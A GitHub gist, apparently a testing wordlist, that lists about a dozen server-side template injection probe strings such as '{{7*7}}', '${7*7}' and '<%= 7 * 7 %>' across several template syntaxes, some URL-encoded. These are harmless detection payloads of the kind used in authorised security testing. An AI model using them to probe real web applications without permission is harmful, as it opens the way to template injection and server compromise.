Skip to content

Instantly share code, notes, and snippets.

@six2dez
Created May 17, 2021 11:47
Show Gist options
  • Save six2dez/ab5277b11da7369bf4e9db72b49ad3c1 to your computer and use it in GitHub Desktop.
Save six2dez/ab5277b11da7369bf4e9db72b49ad3c1 to your computer and use it in GitHub Desktop.
ssti.txt
ssti{{7*7}}
ssti[[7*7]]
ssti{{4+'9'}}
ssti<%= 7 * 7 %>
ssti${7*7}
ssti${{7*7}}
ssti@(40+9)
ssti#{7*7}
ssti#{ 7 * 7 }
ssti<%=%207%20*%207%20%>
ssti#{%207%20*%207%20}
ssti{7*7}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment